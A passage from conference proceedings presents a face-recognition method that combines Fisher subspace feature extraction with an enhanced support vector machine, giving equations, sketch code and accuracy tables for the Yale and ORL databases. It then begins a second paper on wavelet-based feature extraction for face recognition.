training sets of both databases. Remarkable recognition rates of 100 and 92.5% were
achieved on the Yale and ORL databases, respectively.

Keywords Enhanced support vector machine (ESVM) · One-vs-one (OVO) ·


One-vs-all (OVA) · Support vector machine (SVM)

1 Introduction

Facial recognition is a procedure to establish a person’s identity just by analysing


one’s facial features [1]. In recent times, face recognition has seen a surge in its popu-
larity due to the ease of usage it brings with itself. As a result, it has quickly replaced
fingerprint authentication and eye iris analysis. We can find facial identification being

extensively used in mobile handsets nowadays [2]. This new and reliable technique is
also making headways in other critical industries including defence, banking, home
security, etc. Due to these attributes, researchers are continuously working towards
making this novel technology more robust and fool proof.
In pattern recognition, face recognition is the most widely researched topic.
It involves one to many comparisons of a probe face image against all gallery
face images. It consists of three steps majorly divided into—pre-processing (face
detection, normalization), feature extraction (dimensionality reduction) and feature
matching (authentication/recognition) [3, 4]. The extracted features are compared
with the input image and the database.
The input for the face recognition system can be a static image or dynamic image
(image captured by video). This work focuses on the static images for face recog-
nition. To achieve this, a combination of fisher subspace technique and enhanced
support vector machine is used. Other approaches proposed previously are by Turk
and Pentland [5], the concept of Eigenfaces was proposed, and this technique
was unsupervised method. Belhumeour et al. recommended fisher faces [6], which
was a supervised technique. The performance of identification improved with this
procedure.
Zhang et al. and Maria et al. used the Gabor wavelet transform (GWT), stating that this
method has an improved recognition rate, but its memory requirement, computation
and feature dimensions are very high [7, 8]. For illumination-invariant
face recognition, an approach was proposed based on GWT, after which K-nearest
neighbour was applied for classification [9]. Jyotsna et al. recommended a different
methodology for face recognition using principal component analysis, symlet and
cosine angle distance to improve the recognition rate on the AT&T database [10].
The key challenges for positive face detection and recognition systems are illumi-
nation conditions, background, occlusion, pose, expressions, etc. Numerous algo-
rithms and approaches have been put forward to address these issues. For pose
invariant facial recognition, Xi Yin et al. suggested a convolutional neural network-
based methodology [11]. For illumination invariant facial recognition, a normaliza-
tion framework using reflectance ratio and homomorphic filtering was proposed [12].
An approach was proposed for expression invariant face recognition that used PCA,
Gabor filter and support vector machine [13], and also the system could identify
various expressions as angry, sad, etc. For feature extraction under various illumina-
tion conditions, an approach using reflectance ratio and histogram equalization was
proposed [14].
In this work, a variant of support vector machine is developed, named as enhanced
support vector machine (ESVM). With an improvement in computational time,
ESVM outperforms the traditional SVM. For classification, both techniques are used,
one-vs-one and one-vs-all. This work contributes in the following manner:
• Fisher subspace method is used for feature extraction and dimensionality reduc-
tion. The main goal of this technique is to maximize inter-class distance and
minimize distance within the class.
• ESVM is proposed for classification of the input images. This method allows a data
point to lie on the other side of the hyperplane from the group to which it belongs by adding
an error quantity ξ.
• Experimental results are presented on YALE and ORL database, and outstanding
results are achieved, even though no pre-processing technique was applied. Even
better results can be achieved if pre-processing techniques are applied.
This paper is structured as follows: The idea of the proposed methodology is
explained in Sect. 2. Section 3 elaborates on experimental results on Yale and ORL
face image databases to demonstrate the effect of varying sub-dimensions with
varying number of training sets using the proposed methodology. Also, comparison
with existing approaches is shown. The conclusion is conferred in Sect. 5.

2 Proposed Methodology

The proposed approach takes the face database as input and then divides the
input set into training images and test images, as illustrated in Fig. 1. Results are
evaluated by varying the sub-dimensions with different kernels on different numbers of
training sets. The Fisher subspace method [15] is used for feature extraction, producing
reduced-dimensionality data which is fed into the next stage, namely classification. For
classification, an enhanced support vector machine (ESVM) is developed, and for
multiclass classification two techniques are applied: one-vs-one (OVO) and one-
vs-all (OVA). At the last stage of the proposed methodology, i.e. the model evaluation stage, the
recognition accuracy and computational time are calculated for unknown face images.
Using the Fisher subspace method, the test images are reduced to the same dimension as
the training images. Then, each reduced image is classified into one of the class labels.

2.1 Fisher Subspace Feature Extraction Method

Fig. 1 Proposed methodology

The Fisher subspace method is a dimensionality reduction and feature extraction technique
in the pre-processing step for face recognition, just like PCA, but it focuses on
making the within-class distance smaller after the data sets are projected while making the inter-
class distance larger. This method does not work on finding the principal components;
it basically finds the type of features, or the subspace, that gives more discrimination to
separate the data. The goal of the Fisher subspace method is to project an n-dimensional
image onto a smaller subspace s where s ≤ n − 1 [16].
Suppose there are training face images {x_1, x_2, …, x_n} which belong to a total of C classes, X_1, X_2, …, X_C. The steps to calculate the Fisher projections for the images are as follows [17]:
1. Calculate the within-class distance matrix (Sw )

S_w calculates the degree of scatter among items in the same class. It is calculated as
the summation of the covariances of each class, as given in Eq. (3).
The covariance of each class is shown in Eq. (1):

$$S_i = \sum_{x_n \in C_i} (x_n - \mu_i)(x_n - \mu_i)^T \quad (1)$$

where $\mu_i$ is the mean of the images in that class, as cited in Eq. (2):

$$\mu_i = \frac{1}{N_i}\sum_{x_n \in C_i} x_n \quad (2)$$

$$S_w = \sum_{i=1}^{C} S_i \quad (3)$$
n ∈Ci

2. Calculate in-between class distance matrix (Sb )

The degree of scatter (S_b) between the different classes is calculated as the summation
of the covariances of the differences between the class means and the total mean,
as given in Eq. (4):

$$S_b = \sum_{i=1}^{C} N_i\,(\mu_i - m_t)(\mu_i - m_t)^T \quad (4)$$

where $m_t$ is the global mean of all k images, $m_t = \frac{1}{k}\sum_{n=1}^{k} x_n$.

3. Find the best fisher subspace projection vector

Similar to PCA, the eigenvectors having the largest eigenvalues are used to calculate this.
The Fisher criterion function, where w is the projection vector, is expressed in Eq. (5):

$$J(w) = \frac{|S_b|}{|S_w|} = \frac{|w^T S_b w|}{|w^T S_w w|} \quad (5)$$

The goal is to maximize J(w), and the optimal Fisher basis projection matrix can
be obtained as given in Eq. (6):

$$w^* = \arg\max_{w} \frac{|w^T S_b w|}{|w^T S_w w|} \quad (6)$$

The above equation can be transformed into solving for the eigenvalues and
eigenvectors of Eq. (7):

$$S_w^{-1} S_b\, w = \lambda w \quad (7)$$

4. Project images onto fisher projection matrix

All the original images are projected onto the Fisher basis projection matrix by computing
the dot product of the image matrices with each Fisher basis projection vector, as expressed
in Eq. (8):

$$y = w^T X \quad (8)$$

where X is the input data and y is the reduced image.


The reduced training set images and test set images are fed into the next phase for
classification.
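A minimal NumPy sketch of steps 1–4 is given below; the pseudo-inverse guards against a singular S_w (in practice a PCA step usually precedes this for face images, an assumption not detailed here), and n_dims corresponds to the number of Fisher sub-dimensions varied in Sect. 3. Function and variable names are illustrative.

```python
import numpy as np

def fisher_subspace(X, y, n_dims):
    """Top n_dims Fisher projection vectors for data X (one image per row) with labels y."""
    classes = np.unique(y)
    m_t = X.mean(axis=0)                                   # global mean
    d = X.shape[1]
    Sw = np.zeros((d, d))
    Sb = np.zeros((d, d))
    for c in classes:
        Xc = X[y == c]
        mu = Xc.mean(axis=0)
        Sw += (Xc - mu).T @ (Xc - mu)                      # within-class scatter, Eqs. (1)-(3)
        diff = (mu - m_t)[:, None]
        Sb += len(Xc) * diff @ diff.T                      # between-class scatter, Eq. (4)
    # Solve Sw^{-1} Sb w = lambda w (Eq. (7)); pinv guards against a singular Sw.
    eigvals, eigvecs = np.linalg.eig(np.linalg.pinv(Sw) @ Sb)
    order = np.argsort(-eigvals.real)
    W = eigvecs[:, order[:n_dims]].real                    # Fisher basis projection matrix
    return W

# X_reduced = X @ W projects each image onto the Fisher subspace (Eq. (8)).
```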

2.2 Enhanced Support Vector Machine (ESVM)

ESVM stands for enhanced support vector machine [18]. It is a variant of the support
vector machine (SVM). The word enhanced signifies the flexibility it provides to the
otherwise strict SVM. It suggests the inclusion of approximate planes (and not strictly
bounding planes) around which the points of each category are grouped, as illustrated
in Fig. 2.
It is extremely fast and reduces the computational time for large data sets. ESVM
classifies linearly or nonlinearly separable data points by assigning them to the nearest
of two parallel planes which are pushed apart as far as possible (by the term
$w^T w + \gamma^2$). SVM does not perform well when the target classes overlap; in
such cases, ESVM performs better than SVM. ESVM can solve the given problem
using a system of linear equations, as compared to the quadratic programming used in SVM. From the
computational aspect, ESVM is better than SVM, as observed in Sect. 3.
The equations of the two hyperplanes around which the points of each class are clustered
are $x^T w - \gamma = +1$ and $x^T w - \gamma = -1$, respectively. If a point of a class
does not fall on its hyperplane $x^T w - \gamma = -1$, i.e., does not satisfy the equation, a
quantity $\xi$ is added on the left-hand side: $x^T w - \gamma + \xi = -1$. Here $\xi$ represents the eccentricity
of the data point from the plane passing through the particular class to which that
point belongs.

Fig. 2 ESVM with error variable
The learning problem of ESVM is expressed in Eq. (9):

$$\min_{(w,\gamma)} \; \frac{C}{2}\,\xi^T\xi + \frac{1}{2}\left(w^T w + \gamma^2\right) \quad (9)$$

subject to

$$D(Aw - e\gamma) + \xi = e \quad (10)$$

where
e is a vector of ones with dimension (number of data points (m) × 1),
d is the vector of target values,
D = diag(d), where the target value of the ith data point takes the value +1 or −1,
A is the matrix of data points in the input space.
To enhance the performance of ESVM, any kernel can be applied to the data samples in the
matrix A. For our experiments, three kernels are used: (i) to create a linear
classifier using ESVM, a linear kernel function is applied, $k(x_j, x_k) = x_j^T x_k$; (ii) to
create a nonlinear classifier using ESVM, a polynomial kernel function is applied,
$k(x_j, x_k) = (x_j^T x_k + 1)^z$, where z is the order of the polynomial; and (iii) a Gaussian
kernel function is applied as $k(x_j, x_k) = \exp(-\gamma \|x_j - x_k\|^2)$.
H is computed by Eq. (11):

$$H = D\,[A \;\; -e] \quad (11)$$

Using the H matrix, r is solved by Eq. (12):

$$r = I - H\left(\frac{I}{C} + H^T H\right)^{-1} H^T \quad (12)$$

where C is the weighting factor.
The Lagrangian multiplier (u) is calculated using Eq. (13):

$$u = C\, r\, e \quad (13)$$

Now, w and γ can easily be computed using Eqs. (14) and (15):

$$w = A^T D\, u \quad (14)$$

$$\gamma = -e^T D\, u \quad (15)$$

For multiclass classification, two types of classification are used, namely OVO and
OVA. The OVA scheme breaks up a multiclass classification into one binary classifi-
cation problem per class, whereas the OVO strategy divides a multiclass classification
into one binary classification problem per each pair of classes.
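A minimal NumPy sketch of the linear-kernel, binary ESVM solved through Eqs. (11)–(15) is given below; OVO or OVA multiclass classification would simply wrap this binary routine per pair or per class. Forming r as a full m × m matrix is only practical for modest training-set sizes, and the weighting factor C = 1 is an illustrative assumption.

```python
import numpy as np

def esvm_train(A, d, C=1.0):
    """Binary ESVM (linear kernel): solve Eqs. (11)-(15) through one linear system."""
    m, n = A.shape
    D = np.diag(d)                                # d holds +1 / -1 class labels
    H = D @ np.hstack([A, -np.ones((m, 1))])      # Eq. (11): H = D [A  -e]
    M = np.eye(n + 1) / C + H.T @ H               # (I/C + H^T H)
    r = np.eye(m) - H @ np.linalg.solve(M, H.T)   # Eq. (12)
    u = C * (r @ np.ones(m))                      # Eq. (13): Lagrange multipliers
    w = A.T @ (D @ u)                             # Eq. (14)
    gamma = -np.ones(m) @ (D @ u)                 # Eq. (15)
    return w, gamma

def esvm_predict(A_test, w, gamma):
    """Class label = sign(x^T w - gamma)."""
    return np.sign(A_test @ w - gamma)
```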

3 Experimental Results

3.1 Yale Database

To assess the proposed system's performance, tests were performed on the Yale database,
which consists of images in GIF format. There are 15 subjects with 11 images
per individual. The size of each image is 152 × 126 pixels. The proposed algorithm
was implemented in MATLAB 2019. Experiments were performed on a machine
with an Intel Core i5 processor, a 2 GHz CPU and 8 GB RAM. Figure 3(a) shows a few sample
images with different expressions (such as happy, normal, surprised and sad), pose
and illumination.

3.2 ORL Database

The ORL database consists of images of size 112 × 92. Images of 40 individuals in total were
used, with 10 images per individual in GIF format. These images were captured with
varied facial expressions and changing illumination. The images are a combination
of frontal views with minor left-right rotation (Fig. 3(b)).

Fig. 3 a Illustration of Yale face database for a subject, b illustration of ORL face database for a
subject

Three sets of experiments are performed as follows: (i) during feature extraction,
selection of the number of sub-dimensions for different numbers of training images; (ii) ESVM is
applied for multiclass classification, with OVO and OVA applied on both databases;
and (iii) since different kernels have different effects on the performance of machine learning
algorithms, tests are performed using the linear kernel, the polynomial kernel of order 2 and the
Gaussian kernel.

3.3 Selection of Number of Sub-Dimensions in Fisher Space

To determine the minimum number of sub-dimensions required that account for most
of the variation in data, tests are performed with varying sub-dimensions on varying
number of training sets as illustrated in Tables 1 and 2 for Yale and ORL database,
respectively. In order to train the model, three images of every subject are chosen, and
the rest 8 images per subject are used for recognition in Yale database. Similarly, for
ORL database, in order to train the model, three images per subject are chosen, and
the rest 7 images per individual are used for recognition. Different sets of training

Table 1 Result on Yale database when the proposed ESVM system is applied with varying sub-dimensions, linear kernel and OVA classification on different training sets (columns give the number of sub-dimensions)

Training images per individual | 30: Acc (%), t_i (s) | 40: Acc (%), t_i (s) | 50: Acc (%), t_i (s) | 60: Acc (%), t_i (s)
4 | 83.81, 0.177 | 88.57, 0.193 | 85.71, 0.18 | 82.86, 0.172
5 | 80, 0.206 | 87.78, 0.17 | 86.67, 0.179 | 84.44, 0.17
6 | 89.33, 0.181 | 94.67, 0.181 | 96, 0.171 | 96, 0.182
7 | 90, 0.316 | 93.33, 0.166 | 95, 0.16 | 96.67, 0.17
8 | 88.89, 0.24 | 95.56, 0.175 | 95.56, 0.192 | 95.56, 0.178
9 | 96.67, 0.176 | 100, 0.171 | 100, 0.172 | 100, 0.174
Table 2 Result on ORL database when the proposed ESVM system is applied with varying sub-dimensions, linear kernel and OVA classification on different training sets (columns give the number of sub-dimensions)

Training images per individual | 30: Acc (%), t_i (s) | 40: Acc (%), t_i (s) | 50: Acc (%), t_i (s) | 60: Acc (%), t_i (s)
4 | 75.83, 0.253 | 77.92, 0.258 | 80, 0.266 | 81.25, 0.273
5 | 74.5, 0.304 | 79.5, 0.288 | 84.5, 0.371 | 86, 0.302
6 | 78.75, 0.348 | 80.63, 0.355 | 84.38, 0.362 | 85, 0.358
7 | 79.17, 0.396 | 81.67, 0.417 | 86.67, 0.407 | 86.67, 0.416
8 | 81.25, 0.463 | 83.75, 0.479 | 86.25, 0.48 | 87.5, 0.496
9 | 87.5, 0.607 | 92.5, 0.531 | 90, 0.584 | 87.5, 0.568

images considered are 4, 5, 6, 7, 8 and 9 per individual, respectively, for both the
databases.
The acceptable level of retained variance depends on the application: for descriptive purposes, around 80% of the variance may suffice, whereas for further analysis of the data, at least 90% of the variance may be required. The maximum recognition accuracy (Acc) of 100% was achieved on the Yale database with 40 sub-dimensions and 9 training images per individual. Similarly, on the ORL database, the maximum recognition accuracy of 92.5% was also achieved with 40 sub-dimensions. Hence, the number of sub-dimensions used in the following tests is 40. This also means that computational time can be reduced while keeping the same performance of the proposed model. The outcomes are shown in Fig. 4.
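As a hedged illustration of how such a cut-off can be chosen (not the authors' code; scikit-learn PCA is used here as a stand-in for the Fisher subspace projection, and the data are placeholders), the cumulative explained variance can be inspected as follows.

# Sketch: pick the smallest number of sub-dimensions whose cumulative
# explained variance reaches a target such as 90%; PCA stands in for the
# Fisher-subspace projection used in the paper, and the data are random.
import numpy as np
from sklearn.decomposition import PCA

X = np.random.rand(135, 1600)                # hypothetical 135 training face vectors
pca = PCA().fit(X)
cum_var = np.cumsum(pca.explained_variance_ratio_)
n_dims = int(np.searchsorted(cum_var, 0.90) + 1)
print("sub-dimensions retaining 90% of the variance:", n_dims)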
As shown in Fig. 5, the computational time of ESVM is much lower than that of SVM. With 5 training images and 40 sub-dimensions, the proposed methodology computes the recognition accuracy in 0.17 s, whereas SVM with the same dimensions takes 2.91 s. The proposed methodology therefore reduces computational time considerably.

Fig. 4 Accuracy of proposed system on a Yale database at number of sub-dimensions = 40 and training images = 9, b ORL database at number of sub-dimensions = 40 and training images = 9

Fig. 5 Comparison of time (s) for ESVM and SVM on Yale database

3.4 Multiclass Classification: One-Vs-One (OVO), One-Vs-All (OVA)

After the Fisher subspace phase, using the chosen number of sub-dimensions, the data set is passed to the ESVM phase where two categories of classifiers are used, namely OVO and OVA.
First, ESVM with OVO is applied on the Yale database with different numbers of training images per subject. To improve the recognition rate of the ESVM system, a linear kernel with OVA classification is recommended. Table 3 shows the performance of this method on the Yale database for different numbers of training images. There was a significant improvement in accuracy with this configuration, and it also worked faster, as illustrated in Fig. 6. The recognition accuracy with OVO classification was found to be 90% when training with 9 images per individual, whereas for the same training images, an accuracy of 100% was achieved with OVA classification.

Table 3 Result on Yale database when proposed ESVM system is applied with varying training
images with linear kernel and OVO and OVA classification on different training sets
Training set | OVA: Acc (%), t_i (s) | OVO: Acc (%), t_i (s)
4 | 80.2, 0.17 | 78.2, 0.301
5 | 80, 0.177 | 73.33, 0.307
6 | 97.33, 0.172 | 94.67, 0.214
7 | 96.67, 0.175 | 78.33, 0.204
8 | 97.78, 0.174 | 86.67, 0.198
9 | 100, 0.175 | 90, 0.203

Fig. 6 Accuracy of proposed system on a Yale and b ORL database by applying OVO and OVA
at different number of training images

Table 4 Result on ORL database when proposed ESVM system was applied with varying training
images with linear kernel and OVO and OVA classification on different training sets
Training set | OVA: Acc (%), t_i (s) | OVO: Acc (%), t_i (s)
4 | 77.92, 0.258 | 51.25, 0.711
5 | 79.5, 0.288 | 55.5, 0.672
6 | 80.63, 0.355 | 45.63, 0.665
7 | 81.67, 0.417 | 46.67, 0.61
8 | 83.75, 0.479 | 48.75, 0.556
9 | 92.5, 0.531 | 42.5, 0.498

The performance of this system on the ORL database with different numbers of training images is given in Table 4. There is a significant improvement in accuracy with this system, as illustrated in Fig. 6. The recognition accuracy with OVO classification was found to be 42.5% when training with 9 images per individual, whereas for the same training images, an accuracy of 92.5% was achieved with OVA classification.

3.5 Selection of Kernel for ESVM

To further enhance the performance of ESVM, tests were done with different kernels and varying numbers of training images. Kernels are mathematical functions used by an SVM algorithm to transform the data into the required form; commonly used kernel functions include linear, polynomial, sigmoid and Gaussian kernels. On the Yale database, the combination of a linear kernel with OVA gave the best results. Recognition accuracy with a polynomial kernel of order 2 and OVA classification was found to be 85.33%, whereas with a Gaussian kernel it improved to 93.33%,

Table 5 Result on Yale and ORL database when proposed ESVM system was applied with different
kernels and OVA classification on different training sets
Kernels YALE ORL
Acc (%) t i (s) Acc (%) t i (s)
Linear(1) 100% 0.171 92.5 0.545
Polynomial(2) 85.33 0.179 82.5 0.603
Gaussian(3) 93.33 0.209 57.5 0.123

Fig. 7 Accuracy of proposed system on Yale and ORL database by applying different kernels at different number of training images

and with the linear kernel, the maximum accuracy of 100% was attained with 9 training images per individual. The computation time is also lower for the linear kernel, as shown in Table 5.
On the ORL database, recognition accuracy with a polynomial kernel of order 2 and OVA classification was found to be 57.5%, whereas with a Gaussian kernel it improved to 82.5%, and with the linear kernel a maximum accuracy of 92.5% was attained with 9 training images per individual, as shown in Table 5 (the comparison of ORL and Yale is shown in Fig. 7).
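A hedged sketch of such a kernel comparison under OVA classification (again Python/scikit-learn with placeholder data rather than the authors' MATLAB implementation) is shown below.

# Sketch: compare linear, order-2 polynomial and Gaussian (RBF) kernels
# under a one-vs-all scheme; dataset and parameters are placeholders.
from sklearn.datasets import load_digits
from sklearn.model_selection import train_test_split
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC

X, y = load_digits(return_X_y=True)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)

for name, params in [("linear", {"kernel": "linear"}),
                     ("polynomial(2)", {"kernel": "poly", "degree": 2}),
                     ("Gaussian", {"kernel": "rbf"})]:
    clf = OneVsRestClassifier(SVC(**params)).fit(X_tr, y_tr)
    print(name, "accuracy:", clf.score(X_te, y_te))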

4 Comparative Analysis and Discussion

The proposed methodology is compared on the Yale database with the techniques RRHE_RFDWPT, GradF, SVM_KNN and IKLDA_PNN, with the number of training images set to 6 and 4, as presented in Table 6. The proposed system uses a combination of Fisher subspace feature extraction and an enhanced support vector machine. It outperforms the above-mentioned techniques in terms of accuracy. The outcomes on ORL

Table 6 Proposed methodology comparison with various techniques on Yale database

Approaches | Accuracy rate (%)
IKLDA_PNN [20] (No. of training images = 6) | 81.56
GradF [21] (No. of training images = 6) | 93.4
SVM_KNN [22] (No. of training images = 4) | 95.25
RRHE_DWPT [14] (No. of training images = 6) | 96.46
Proposed methodology (No. of training images = 6) | 97.33

Table 7 Proposed methodology comparison with various techniques on ORL database

Approaches | Accuracy rate (%)
PCA_KNN (k = 5) [23] (No. of training images = 7) | 72
PCA_SVM (poly quad) [24] | 72.9
PCA_SVM (poly linear) [24] | 76.7
PCA_KNN (k = 3) [23] (No. of training images = 7) | 78
DCT_PCA [25] (No. of training images = 6) | 91.84
Proposed methodology (No. of training images = 9) | 92.5

database are compared with the techniques PCA_KNN (k = 3, 5), PCA_SVM (poly linear kernel), PCA_SVM (poly quad kernel) and DCT_PCA, with the number of training images set to 6 and 7, as shown in Table 7. The outcomes on the ORL database in terms of recognition rate are impressive using the proposed methodology, and the computational time is much lower than that of traditional SVM, as compared in [19].

5 Conclusion

In this paper, a technique for multiclass face classification based on ESVM in Fisher subspace has been proposed. The proposed multi-classification technique was applied to the Yale and ORL databases, on which accuracies of 100% and 92.5% were achieved, respectively. This method outperforms traditional SVM, as shown in the comparison, and is computationally faster. A number of experiments were performed with different kernels of the proposed ESVM technique and by varying the number of sub-dimensions to achieve high accuracy. ESVM works best with a linear kernel using the OVA classification method and also performs better than the other compared techniques. As future work, we are exploring wavelets in combination with the proposed methodology and other machine learning algorithms for classification.

References

1. Li, S. Z., & Jain, A. K. (2005). Handbook of face recognition. Springer.


2. Okokpujie, K., Noma-Osaghae, E., John, S., Grace, K., & Okokpujie, I. (2017). A face recog-
nition attendance system with GSM notification. In IEEE 3rd International Conference on
Electro-Technology for National Development (NIGERCON), Owerri (pp. 239–244). https://
doi.org/10.1109/NIGERCON.2017.8281895.
3. Soltanpour, S., Boufama, B., Jonathan Wu, Q. M. (2017). A survey of local feature methods
for 3D face recognition. Pattern Recognition, 72, 391–406. ISSN 0031-3203, https://doi.org/
10.1016/j.patcog.2017.08.003.
4. Zhao, W., Chellappa, R., Phillips, P. J., & Rosenfeld, A. (2003). Face recognition: A literature
survey. ACM Computing Surveys, 35(4), 399–458. https://doi.org/10.1145/954339.954342.
5. Turk, M., & Pentland, A. (1991). Eigenfaces for recognition. Journal of Cognitive Neuro-
science, 3(1), 71–86. https://doi.org/10.1162/jocn.1991.3.1.71
6. Belhumeur, P. N., Hespanha, J. P., & Kriegman, D. J. (1997). Eigenfaces vs. fisherfaces:
Recognition using class specific linear projection. IEEE Transactions on Pattern Analysis and
Machine Intelligence, 19(7), 711–720. https://doi.org/10.1109/34.598228.
7. Zhang, Z., Lyons, M., Schuster, M., & Akamatsu, S. (1998). Comparison between geometry-
based and Gabor-wavelets-based facial expression recognition using multi-layer perceptron. In
Proceedings Third IEEE International Conference on Automatic Face and Gesture Recognition,
Nara (pp. 454–459). https://doi.org/10.1109/AFGR.1998.670990.
8. Mahmood, M., Jalal, A., Evans, H. A. (2018). Facial expression recognition in image sequences
using 1D transform and gabor wavelet transform. In 2018 International Conference on Applied
and Engineering Mathematics (ICAEM), Taxila (pp. 1–6).
9. Kathuria, D., & Yadav, J. (2018). An improved illumination invariant face recognition based on
Gabor wavelet transform. In 2018 Conference on Information and Communication Technology
(CICT), Jabalpur, India (pp. 1–6). https://doi.org/10.1109/INFOCOMTECH.2018.8722408.
10. Yadav, J., Rajpal, N., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA
and cosine angle distance measure. In 2016 Ninth International Conference on Contemporary
Computing (IC3), Noida (pp. 1–7). https://doi.org/10.1109/IC3.2016.7880231.
11. Yin, X., & Liu, X. (2018). Multi-task convolutional neural network for pose-invariant face
recognition. IEEE Transactions on Image Processing, 27(2), 964–975. https://doi.org/10.1109/
TIP.2017.2765830
12. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent and Fuzzy Systems, 35, 5265–5277.
13. Balasundaram, A., & Ashokkumar, S. (2020). Study of facial expression recognition using
machine learning techniques. Journal of Critical Reviews, 7(8), 2429–2437.
14. Yadav, J., Rajpal, N., & Mehta, R. (2019). An improved illumination normalization and robust
feature extraction technique for face recognition under varying illuminations. Arabian Journal
for Science and Engineering, 44(11), 9067–9086.
15. Martis, R. J., Acharyaa, U. R., & Min, L. C. (2013). ECG beat classification using PCA, LDA,
ICA and discrete wavelet transform. Biomedical Signal Processing and Control, 8, 437–448.
https://doi.org/10.1016/j.bspc.2013.01.005
16. Bajrami, X., Gashi, B., & Murturi, I. (2018). Face recognition performance using linear discrim-
inant analysis and deep neural networks. International Journal of Applied Pattern Recognition,
5(3), 240–250.
17. Yadav, J., Rajpal, N., & Mehta, R. (2018). An improved hybrid illumination normalization
and feature extraction model for face recognition. International Journal of Applied Pattern
Recognition, 5(2), 149–170. https://doi.org/10.1504/IJAPR.2018.092523
18. Soman, K. P., Loganathan, R., & Ajay, V. (2009). Machine learning with SVM and other Kernel
methods. PHI Learning.

19. Rajpal, N., Singh, A., & Yadav, J. (2018). An expression invariant face recognition based on
proximal support vector machine. In 2018 4th International Conference for Convergence in
Technology (I2CT) (pp. 1–7). https://doi.org/10.1109/I2CT42659.2018.9058243.
20. Ouyanga, A., Liub, Y., Pei, S., Penga, X., He, M., & Wang, Q. (2020) A hybrid improved
kernel LDA and PNN algorithm for efficient face recognition. Neurocomputing, 393, 214–222.
https://doi.org/10.1016/j.neucom.2019.01.117.
21. Zhang, T., Tang, Y. Y., Fang, B., Shang, Z., & Liu, X. (2009). Face recognition under varying
illumination using gradientfaces. IEEE Transactions on Image Processing, 18(11), 2599–2606.
https://doi.org/10.1109/TIP.2009.2028255
22. Nayef Al-Dabagh, M. Z., Mohammed Alhabib, M. H., & AL-Mukhtar, F. H. (2018). Face
recognition system based on kernel discriminant analysis, k-nearest neighbor and support
vector machine. International Journal of Research and Engineering, 5(3), 335–338.
23. Rakshit, P., Basu, R., Paul, S., Bhattacharyya, S., Mistri, J., & Nath, I. (2019). Face detection
using support vector machine with PCA. In 2nd International Conference on Non-Conventional
Energy: Nanotechnology and Nanomaterials for Energy and Environment (ICNNEE).
24. Gumus, E., Kilic, N., Sertbas, A., & Ucan, O. N. (2010). Evaluation of face recognition using
PCA, wavelets and SVM. Expert Systems with Applications, 37, 6404–6408. https://doi.org/
10.1016/j.eswa.2010.02.079.
25. Abikoye, O. C., Shoyemi, I. F., & Aro, T. O. (2019). Comparative analysis of illumination
normalizations on principal component analysis based feature extraction for face recognition.
FUOYE Journal of Engineering and Technology, 4(1), 67–69.
Large Scale Double Density Dual Tree
Complex Wavelet Transform Based
Robust Feature Extraction for Face
Recognition

Juhi Chaudhary and Jyotsna Yadav

Abstract Varying conditions in face recognition often cause intrapersonal variations, due to which efficient feature extraction is desirable. In this work, a significant feature
extraction technique based on Double Density Dual Tree Complex Wavelet Trans-
form (DD_DTCWT) is proposed for face recognition. DD_DTCWT is a variant
of wavelet transformation which provides better multiresolution sub-band spectral
analysis of face images with good shift invariance and directional selectivity. Exten-
sive experiments are performed with slight pose variations on ORL database and
on images with illumination and expression variations in YALE database. It has
been depicted from experimental results that the proposed technique for large-scale
Double Density Dual Tree Complex Wavelet Transform-based robust feature extrac-
tion yields accurate results on Yale database and better results on ORL database as
compared with state-of-the-art techniques. The classification is performed on training
and testing face vectors based on DD_DTCWT using K-nearest neighbor classi-
fier. Several experiments are performed to analyze significant features by varying
decomposition levels for sub-band selection and number of images in training set.

Keywords Double density dual-tree complex wavelet transform (DD_DTCWT) · K-nearest neighbor · Filter bank · Directional selectivity · Shift invariance

1 Introduction

Face recognition (FR) is an approach for identification and authentication of a human face from captured digital images or videos [1]. Among various biometric systems, facial recognition systems have gained vital importance because of their practical applications such as access control, authentication and surveillance. The face recognition process is broadly divided into the following stages: preprocessing,

J. Chaudhary · J. Yadav (B)


University School of Information and Communication Technology, Guru Gobind Singh
Indraprastha University, Dwarka, New Delhi, India
e-mail: jyotsnayadav@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 409
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_33

feature extraction (dimensionality reduction) and feature classification or matching [2].
There are some critical challenges due to which the appearance of an individual changes, such as facial expression, illumination or lighting variations, aging, low resolution, pose variations and surgery. Consequently, researchers have not attained the desired level of accuracy in face recognition because of these challenges. To overcome these issues, many FR techniques have been introduced, and research is still ongoing. A good FR system must be robust to the above-stated varying conditions that alter the image and hinder the
recognition process. In the study [3], authors have performed illumination normaliza-
tion by utilizing homomorphic filtering based on discrete wavelet transform (DWT)
in 2018. This work was extended in [4] where the authors have also introduced
a novel technique for light variation conditions based on reflectance ratio (RR)
and integer wavelet transform (IWT) in fisher sub-space. Selvakumar et al. in 2015
proposed sparse representation technique for normalizing illumination variations in
logarithmic domain by utilizing DTCWT and eigen sub-space [5]. Wang et al. [6]
presented an adaptive singular value decomposition based on 2D-DWT (ASVDW)
method for illumination compensation over color images in 2018. In recent work, the authors of [7] proposed a novel adaptive illumination normalization approach for FR. They utilized the fractional discrete cosine transform (Fr-DCT) with a non-iterative classifier (KELM) and obtained accurate results on the CMU-PIE face database in 2020. In [8], the authors utilized PCA-, ICA- and LDA-based FR approaches built on the discrete wavelet transform (DWT), employing an SVM classifier for recognition. This work performed experiments on the AT&T database, with the LL (approximation/low-pass) sub-image selected iteratively. Dalali et al. in 2016 [9] utilized
a FR system based on Daubechies wavelet and modified local binary pattern (LBP)
technique at a single level of decomposition on the MIT face database. Huang et al. in work [10] proposed a central symmetric local direction pattern (CSLDP) technique with the Gabor wavelet transform, addressing illumination variations, in 2017. In this study, the authors performed experiments on the AR and YALE databases with a sparse representation classifier (SRC). In another work [11], Rajpal et al. proposed an expression-invariant FR technique in eigen subspace. This work utilized a proximal support vector machine (PSVM) nonlinear classifier on the JAFFE database, achieving a 98.33% recognition rate (RR).
Hence, it is observed from the above-cited recent studies that researchers have mostly relied on preprocessing techniques for robust feature extraction and better RR. The major contributions of the proposed FR system are as follows:
